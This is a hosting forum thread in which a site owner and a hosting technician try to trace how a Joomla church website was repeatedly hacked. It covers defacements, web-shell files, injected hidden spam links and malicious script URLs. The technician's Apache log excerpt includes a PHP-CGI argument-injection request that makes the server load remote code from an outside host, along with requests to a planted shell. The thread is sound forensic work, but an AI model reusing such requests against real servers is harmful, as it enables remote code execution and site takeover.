Акция!  Домен 34 грн, домен 55 грн, домен  - 65 грн, домен  - 99 грн, домен  - 56 грн!, домен  - 425 грн!
Мы используем cookie-файлы
Для оптимизации работы нашего сайта мы используем cookie-файлы. Продолжая использовать сайт, Вы соглашаетесь с использованием cookie-файлов.
  • RUB
  • USD
  • EUR
  • UAH
Чат техподдержки
Вы являетесь клиентом?
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 170-15-42  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Пожелания и предложения. Помощь с нахождением причины взлома в логах

Форумы Пожелания и предложения Помощь с нахождением причины взлома в логах
EparhiaNik
6 лет
хостинг: нет
домен: нет
Помощь с нахождением причины взлома в логах
Здравствуйте.
Сайт несколько раз ломали, информацию о всех случаях сохранял. Может ли кто-то из специалистов хостинга по этим данным и логам сервера определить пути взлома?
rudenko
6 лет
хостинг: есть
домен: есть
Смотря какую информацию вы сохраняли и что подразумевается под ломали. Напишите подробную информацию, поможем чем сможем.
EparhiaNik
6 лет
хостинг: нет
домен: нет
Куда писать?
rudenko
6 лет
хостинг: есть
домен: есть
На форуме можете писать, если там нет Ваших паролей. Другим тоже будет интересно как искать уязвимости.
EparhiaNik
6 лет
хостинг: нет
домен: нет
Ломали=получали доступ на сайт, записывали и изменяли файлы.

Файлы прилагаются в архиве. На архиве пароль - '1240', а то открытый архив антивирусы не пропускают. Кстати, раньше касперский в этих php вирусов не замечал, а теперь замечает. Пишет на них "Backdoor.PHP.PhpShell.dl" и удаляет с диска.

Случаи взлома сайта:
1) 11.08.2011
При входе на сайт отображалась страничка Hacked by Number 7 ~ Tunisian Hacke

Текст был такой:
---------------------------------------------------
Your Web Site Got Hacked By A tunisian Hacker called "Number 7"<br>
Hacked by Number 7<br>
You have No Security <br>
you must secure your web site<br>
for more security, contact : <br>
an.7@live.fr <br>
Greetz: # Tunisian Hackers<br>

Решение проблемы: Просто восстанавил сайт из бэкапа.

На наш сайт пару раз записывались вредоносные *.php, которые находил антивирус хостинга.

2) 11.12.2012

Записаны вредоносные *.php. Письмо от хостинга:
-------------------------------------------------
Вы получили это письмо как владелец хостинг-аккаунта eparhia. В результате проверки аккаунта антивирусом были обнаружены файлы, которые являются вредоносными или заражены.
Результаты поиска вредоносных файлов
Чаще всего наличие таких файлов свидетельствует о получении доступа к сайту злоумышленником с целью рассылки спама, осуществления атак на другие сайты и размещения фишинговых страниц. Список обнаруженных вредоносных файлов:
eparhia.mk.ua/2011-2012/images/stories/story.php
eparhia.mk.ua/www/images/stories/bobbi.php
----------------------------------------------------
Вредоносные файлы удалил, но после этого остались посторонние вставки в генерируемые html. (Заметил их только недавно, определил момент появления с помощью сервиса Вебархив
http://web.archive.org/web/201303...
посмотрел до взлома небыло, а после - появилось) :
------------------------------------------------------
<!-- 8c19761b95 --><div style="display:none"><a href="http://www.nwrpca.org/">... loans</a></div><!-- 8c19761b95 -->
-----------------------------------------------------

3) 29.05.2013
Антивирус хостинга прислал сообщение о вредоносных *.php. Найденные файлы удалил, сохранил сами файлы и дату их модификации.

Начиная с этого времени при просмотре сайта начал выводить собщения Антивирус Каперского:

I)
main Запрещено: HEUR:Trojan.Script.Generic 14.06.2013 13:55:49
http://blog2.therainbowcloud.com:6842/cb/main.ph...

II)
main.php?groupcp=174&sponsor=82&extra=237&deals=791&board=198&profile=133
Запрещено:
http://blog2.therainbowcloud.com:6842/commercial... (проверка по базе вредоносных веб-адресов) 14.06.2013 14:35:10
http://blog2.therainbowcloud.com:6842/commercial...

III)
main Обнаружено: HEUR:Trojan.Script.Generic 14.06.2013 15:48:18
http://blog2.kapsol.mobi:6842/cnet/main....

4) 06.06.13
Антивирус хостинга прислал сообщение о вредоносных *.php.
В корневом каталоге файлы: wp-conf.php, wthm6103g

Позже нашел в дирректории «/images»
файл 59e48.php
в корневом каталоге и во всех подкаталогах корневого такие файлы:

index_backup.php
.htaccess - со вставкой вначале подозрительного кода, либо просто с одним подозрительным кодом.
Дата создания файлов — 27.05.2013, антивирус хостинга их не нашел.
Решение: поудалял все подозрительные файлы.

Меры профилактики:
-Обновился до последней версии Джумлы 1.5.26
-Обновил все расширения, ненужные удалил
-Сменил логин админа, запретил доступ в /administrator со всех IP кроме своей подсети
-запретил запись в '/administrator' и 'configuration.php'
-изменил стандартные префиксы таблиц в БД
Прикрепленные файлы:
rudenko
6 лет
хостинг: есть
домен: есть
За старые даты я не удастся посмотреть информацию, так как логов за столь длительный период времени - нет. 27 мая для заливки вирусов использовался существующий на тот момент файл wthm3925g.php Если бы знать когда создан был тот файл, то можно было бы найти как он попал на сервер и так идя по цепочке можно прийти к первоисточнику - запросу к Joomla или ее модулю, который был использован для заливки первого эксплоита. Лучше всего искать источник не удаляя вирусы. Кроме этого нужно сохранять не только дату, но и точное время с секундами.

Вот выдержка из лога Apache:
209.200.227.229 - - [27/May/2013:02:25:26 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 35372 "-" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.15-1.2054_FC5; X11; i686; en_US) KHTML/3.5.4 (like Gecko)"
192.232.224.208 - - [27/May/2013:02:25:28 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 8278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
50.87.9.175 - - [27/May/2013:02:25:33 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 36193 "-" "Lynx/2.8 libwww-FM/2.1 SSL-MM/1.4 GNUTLS/0.8"
31.133.43.73 - - [27/May/2013:13:18:04 +0300] "POST /wthm3925g.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1939 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
196.41.137.243 - - [27/May/2013:19:31:52 +0300] "POST /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://basemen.hk/success.tx... HTTP/1.0" 200 33962 "http://www.eparhia.mk.ua/?-n+-dallo... "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.452) Gecko/20041027 Mnenhy/0.6.0.104"
31.133.43.73 - - [27/May/2013:20:24:54 +0300] "POST /wthm3925g.php?t3420n=1&cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
95.134.122.147 - - [27/May/2013:20:50:20 +0300] "POST /photo/category/444-24032013-pravyashhij-arxierej-vozglavil-liturgiyu-i-chin-torzhestva-pravoslaviya.html HTTP/1.0" 200 7711 "http://eparhia.mk.ua/photo/cate... "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.71 Safari/537.17 YE"
217.23.3.13 - - [27/May/2013:23:55:43 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 423 86 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
EparhiaNik
6 лет
хостинг: нет
домен: нет
/eparhia.mk.ua/www/wthm3925g.php модифицирован 27.05.2013 13:18:04
Думаю что это и есть дата создания
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.